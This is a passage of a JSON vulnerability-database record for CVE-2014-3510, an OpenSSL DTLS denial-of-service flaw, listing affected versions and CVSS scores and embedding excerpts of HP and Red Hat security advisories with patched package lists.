"trust": 0.3, "vendor": "hp", "version": "1.4-476" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "project openssl 0.9.8u", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "6.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "6.4-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null } ], "sources": [ { "db": "BID", "id": "69082" }, { "db": "CNNVD", "id": "CNNVD-201408-130" }, { "db": "NVD", "id": "CVE-2014-3510" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8u:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8za:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8w:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8v:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8y:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8x:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3510" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Felix Gr\u0026amp;amp;ouml;bert", "sources": [ { "db": "CNNVD", "id": "CNNVD-201408-130" } ], "trust": 0.6 }, "cve": "CVE-2014-3510", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2014-3510", "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3510", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201408-130", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2014-3510", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3510" }, { "db": "CNNVD", "id": "CNNVD-201408-130" }, { "db": "NVD", "id": "CVE-2014-3510" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote DTLS servers to cause a denial of service (NULL pointer dereference and client application crash) via a crafted handshake message in conjunction with a (1) anonymous DH or (2) anonymous ECDH ciphersuite. OpenSSL is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to crash the affected application, denying service to legitimate users. \nOpenSSL prior to 0.9.8zb, 1.0.0n, and 1.0.1i are vulnerable. \n - The SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"Poodle\", which could be exploited remotely\nresulting in disclosure of information. Alternatively, you may reboot your system. \n\nFor the testing distribution (jessie), these problems will be fixed\nsoon. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04426586\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04426586\nVersion: 1\n\nHPSBOV03099 rev.1 - HP OpenVMS running OpenSSL, Remote Denial of Service\n(DoS) or Disclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-09-12\nLast Updated: 2014-09-12\n\nPotential Security Impact: Remote Denial of Service (DoS), disclosure of\ninformation\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP OpenVMS\nrunning OpenSSL. \n\nReferences:\n\nCVE-2014-3505 - Remote Denial of Service (DoS)\nCVE-2014-3506 - Remote Denial of Service (DoS)\nCVE-2014-3507 - Remote Denial of Service (DoS)\nCVE-2014-3508 - Remote Disclosure of Information\nCVE-2014-3510 - Remote Denial of Service (DoS)\n\nSSRT101686\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP SSL Version 1.4-476 and earlier for OpenVMS\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-3505 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3506 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3507 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-3510 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software update available to resolve the\nvulnerabilities with HP OpenVMS running OpenSSL. \n\n HP SSL Version 1.4-493 for OpenVMS is available from the following\nlocation:\n\n http://h71000.www7.hp.com/openvms/products/ssl/ssl.html\n\nHISTORY\nVersion:1 (rev.1) - 12 September 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2014:1052-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-1052.html\nIssue date: 2014-08-13\nCVE Names: CVE-2014-3505 CVE-2014-3506 CVE-2014-3507 \n CVE-2014-3508 CVE-2014-3509 CVE-2014-3510 \n CVE-2014-3511 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary. \n\nA race condition was found in the way OpenSSL handled ServerHello messages\nwith an included Supported EC Point Format extension. A malicious server\ncould possibly use this flaw to cause a multi-threaded TLS/SSL client using\nOpenSSL to write into freed memory, causing the client to crash or execute\narbitrary code. (CVE-2014-3509)\n\nIt was discovered that the OBJ_obj2txt() function could fail to properly\nNUL-terminate its output. This could possibly cause an application using\nOpenSSL functions to format fields of X.509 certificates to disclose\nportions of its memory. (CVE-2014-3508)\n\nA flaw was found in the way OpenSSL handled fragmented handshake packets. \nA man-in-the-middle attacker could use this flaw to force a TLS/SSL server\nusing OpenSSL to use TLS 1.0, even if both the client and the server\nsupported newer protocol versions. (CVE-2014-3511)\n\nMultiple flaws were discovered in the way OpenSSL handled DTLS packets. \nA remote attacker could use these flaws to cause a DTLS server or client\nusing OpenSSL to crash or use excessive amounts of memory. (CVE-2014-3510)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1127490 - CVE-2014-3508 openssl: information leak in pretty printing functions\n1127498 - CVE-2014-3509 openssl: race condition in ssl_parse_serverhello_tlsext\n1127499 - CVE-2014-3505 openssl: DTLS packet processing double free\n1127500 - CVE-2014-3506 openssl: DTLS memory exhaustion\n1127502 - CVE-2014-3507 openssl: DTLS memory leak from zero-length fragments\n1127503 - CVE-2014-3510 openssl: DTLS anonymous (EC)DH denial of service\n1127504 - CVE-2014-3511 openssl: TLS protocol downgrade attack\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-static-1.0.1e-16.el6_5.15.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\n\nppc64:\nopenssl-1.0.1e-16.el6_5.15.ppc.rpm\nopenssl-1.0.1e-16.el6_5.15.ppc64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.ppc.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.ppc64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.ppc.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-16.el6_5.15.s390.rpm\nopenssl-1.0.1e-16.el6_5.15.s390x.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.s390.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.s390x.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.s390.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-static-1.0.1e-16.el6_5.15.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.ppc64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.ppc64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.s390x.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.s390x.rpm\nopenssl-static-1.0.1e-16.el6_5.15.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-devel-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nopenssl-1.0.1e-16.el6_5.15.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.i686.rpm\nopenssl-static-1.0.1e-16.el6_5.15.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.15.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.15.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.4.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.4.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.4.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.4.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.4.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 